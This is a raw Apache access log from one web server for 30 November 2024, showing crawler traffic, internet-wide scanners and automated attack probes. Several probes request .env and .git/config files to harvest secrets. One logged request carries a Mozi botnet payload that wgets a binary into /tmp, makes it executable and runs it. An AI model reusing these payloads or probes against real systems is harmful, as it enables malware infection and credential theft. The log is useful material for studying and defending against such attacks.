156.59.198.135 - - [30/Nov/2024:01:06:19 +0100] "GET /ed.activities.at/stats/lang/awstats-ar.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.252.207 - - [30/Nov/2024:01:16:50 +0100] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.93 Chrome/124.0.6367.93 Not-A.Brand/99 Safari/537.36"
156.59.198.136 - - [30/Nov/2024:01:17:30 +0100] "GET /renault.activities.at/htdocs/binaries/10223416.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:01:21:59 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image071.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.163.250 - - [30/Nov/2024:01:23:47 +0100] "\x16\x03\x01" 400 383 "-" "-"
179.43.163.250 - - [30/Nov/2024:01:23:47 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
179.43.163.250 - - [30/Nov/2024:01:23:48 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [30/Nov/2024:01:23:48 +0100] "GET /.env.prod HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:48 +0100] "GET /.env.production HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:49 +0100] "GET /.env.ci HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:49 +0100] "GET /.env.production.local HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:49 +0100] "GET /build/.env HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:50 +0100] "GET /.env.testing.local HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:50 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:50 +0100] "GET /public/.git/config HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:50 +0100] "GET /dev/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:51 +0100] "GET /.env.prod.local HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:51 +0100] "GET /config/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:51 +0100] "GET /prod/.env HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:01:23:51 +0100] "GET /src/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
156.59.198.136 - - [30/Nov/2024:01:26:50 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image151.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:01:44:37 +0100] "GET /renault.activities.at/htdocs/binaries/10009030.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [30/Nov/2024:01:48:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [30/Nov/2024:01:48:37 +0100] "GET /docs/ecommlogistics/belege/GS17-00002.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:02:13:24 +0100] "GET /renault.activities.at/htdocs/binaries/10661192.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [30/Nov/2024:02:29:03 +0100] "GET / HTTP/1.1" 200 423 "-" "Linux Gnu (cow)"
156.59.198.135 - - [30/Nov/2024:02:37:35 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.10 - - [30/Nov/2024:02:37:47 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.10 - - [30/Nov/2024:02:37:47 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
185.242.226.10 - - [30/Nov/2024:02:40:21 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.10 - - [30/Nov/2024:02:40:21 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.135 - - [30/Nov/2024:02:41:36 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201907191503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.147.124.104 - - [30/Nov/2024:02:42:50 +0100] "\x03" 400 383 "-" "-"
5.8.11.202 - - [30/Nov/2024:02:51:12 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [30/Nov/2024:02:58:15 +0100] "GET /hausegger.activities.at/stats/lang/awstats-ru.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.191.209.206 - - [30/Nov/2024:03:15:30 +0100] "\x03" 400 383 "-" "-"
156.59.198.135 - - [30/Nov/2024:03:18:17 +0100] "GET /hausegger.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:03:22:17 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111221703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.126.115.226 - - [30/Nov/2024:03:34:07 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
87.120.120.18 - - [30/Nov/2024:03:46:25 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1"
141.98.11.35 - - [30/Nov/2024:03:46:45 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
93.174.93.12 - - [30/Nov/2024:04:09:28 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62"
46.107.218.63 - - [30/Nov/2024:04:10:29 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
205.210.31.65 - - [30/Nov/2024:04:14:29 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
194.50.16.198 - - [30/Nov/2024:04:15:43 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 362 "-" "-"
156.59.198.135 - - [30/Nov/2024:04:22:30 +0100] "GET /renault.activities.at/htdocs/binaries/10279221.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
66.240.205.34 - - [30/Nov/2024:04:26:00 +0100] "Gh0st\xad" 400 383 "-" "-"
156.59.198.136 - - [30/Nov/2024:04:35:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102240803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:04:39:23 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106171403_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:04:43:23 +0100] "GET /renault.activities.at/htdocs/ewp/ew_includes/popups/ew_images/refresh.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:04:47:23 +0100] "GET /renault.activities.at/htdocs/binaries/10009028.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [30/Nov/2024:04:47:57 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
125.228.91.168 - - [30/Nov/2024:05:05:53 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.136 - - [30/Nov/2024:05:11:26 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012160903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [30/Nov/2024:05:14:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [30/Nov/2024:05:15:26 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006031103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [30/Nov/2024:05:31:03 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 363 "-" "-"
156.59.198.136 - - [30/Nov/2024:05:35:56 +0100] "GET /renault.activities.at/htdocs/activities/gui/frames/phpinfo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.79 - - [30/Nov/2024:05:41:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [30/Nov/2024:05:43:01 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011101103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
104.152.52.208 - - [30/Nov/2024:05:59:15 +0100] "GET / HTTP/1.0" 200 423 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
156.59.198.136 - - [30/Nov/2024:05:59:53 +0100] "GET /hausegger.activities.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.124.238 - - [30/Nov/2024:06:03:57 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.57.224 - - [30/Nov/2024:06:07:53 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.191.209.206 - - [30/Nov/2024:06:18:28 +0100] "\x03" 400 383 "-" "-"
95.214.53.205 - - [30/Nov/2024:06:37:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [30/Nov/2024:06:37:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912231003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [30/Nov/2024:06:38:07 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
93.174.93.12 - - [30/Nov/2024:06:45:41 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
172.168.41.212 - - [30/Nov/2024:06:48:29 +0100] "GET /druid/index.html HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
95.214.55.43 - - [30/Nov/2024:06:49:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.9.154.223 - - [30/Nov/2024:06:51:28 +0100] "GET /manager/html HTTP/1.1" 404 283 "-" "python-requests/2.27.1"
156.59.198.136 - - [30/Nov/2024:07:01:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202112031003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.147.124.104 - - [30/Nov/2024:07:07:49 +0100] "\x03" 400 383 "-" "-"
141.98.11.35 - - [30/Nov/2024:07:11:17 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
146.190.224.102 - - [30/Nov/2024:07:13:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
146.190.224.102 - - [30/Nov/2024:07:13:05 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://mail.creativecube.at/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
146.190.224.102 - - [30/Nov/2024:07:13:05 +0100] "GET /ads.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
156.59.198.136 - - [30/Nov/2024:07:14:39 +0100] "GET /hausegger.activities.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.133.122 - - [30/Nov/2024:07:18:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.172 - - [30/Nov/2024:07:27:13 +0100] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.172 - - [30/Nov/2024:07:27:13 +0100] "\x16\x03\x01" 400 383 "-" "-"
141.98.11.35 - - [30/Nov/2024:07:54:15 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
209.38.167.42 - - [30/Nov/2024:07:54:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
209.38.167.42 - - [30/Nov/2024:07:54:43 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
59.99.213.176 - - [30/Nov/2024:07:55:07 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 383 "-" "-"
156.59.198.135 - - [30/Nov/2024:08:07:54 +0100] "GET /docs/ecommlogistics/belege/AB16-000015.pdf HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:08:11:53 +0100] "GET /renault.activities.at/htdocs/binaries/10442911.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:08:15:53 +0100] "GET /renault.activities.at/htdocs/binaries/10052852.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.66.76.134 - - [30/Nov/2024:08:16:08 +0100] "\x03" 400 383 "-" "-"
156.59.198.135 - - [30/Nov/2024:08:19:53 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910101203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:08:23:53 +0100] "GET /docs/contadino/2015/AG15-00017.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.35 - - [30/Nov/2024:08:35:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
154.73.64.16 - - [30/Nov/2024:08:50:54 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.135 - - [30/Nov/2024:08:58:32 +0100] "GET /ed.activities.at/stats/lang/awstats-id.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:09:02:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106111703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:09:06:32 +0100] "GET /ed.activities.at/stats/lang/awstats-mk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.35 - - [30/Nov/2024:09:08:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [30/Nov/2024:09:10:32 +0100] "GET /ed.activities.at/stats/lang/awstats-it.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:09:17:27 +0100] "GET /renault.activities.at/htdocs/binaries/10004867.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:09:21:27 +0100] "GET /ed.activities.at/stats/lang/awstats-al.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:09:25:27 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012291803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [30/Nov/2024:09:30:18 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
20.118.69.144 - - [30/Nov/2024:09:41:13 +0100] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
147.185.133.50 - - [30/Nov/2024:09:42:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.248 - - [30/Nov/2024:09:53:09 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [30/Nov/2024:10:04:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012161403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.126.25.244 - - [30/Nov/2024:10:05:59 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.136 - - [30/Nov/2024:10:08:11 +0100] "GET /docs/contadino/CIT/RE18-00013.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.35 - - [30/Nov/2024:10:08:15 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [30/Nov/2024:10:12:34 +0100] "GET /renault.activities.at/htdocs/binaries/10623060.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:10:16:34 +0100] "GET /renault.activities.at/htdocs/binaries/10009029.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:10:20:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908201703_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.10 - - [30/Nov/2024:10:37:33 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
184.105.139.67 - - [30/Nov/2024:10:50:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
184.105.139.67 - - [30/Nov/2024:10:53:06 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)"
184.105.139.67 - - [30/Nov/2024:10:53:44 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
141.98.11.35 - - [30/Nov/2024:10:55:06 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
194.50.16.198 - - [30/Nov/2024:11:05:36 +0100] "POST /apply.cgi HTTP/1.1" 404 284 "http://212.69.160.11:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
156.59.198.135 - - [30/Nov/2024:11:13:50 +0100] "GET /ed.activities.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [30/Nov/2024:11:17:29 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1"
156.59.198.136 - - [30/Nov/2024:11:17:51 +0100] "GET /ed.activities.at/stats/lang/awstats-de.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
206.168.34.201 - - [30/Nov/2024:11:24:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.201 - - [30/Nov/2024:11:24:22 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.201 - - [30/Nov/2024:11:24:22 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.201 - - [30/Nov/2024:11:24:22 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.135 - - [30/Nov/2024:11:45:22 +0100] "GET /docs/ecommlogistics/belege/GS16-000002.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.113.56 - - [30/Nov/2024:11:56:32 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
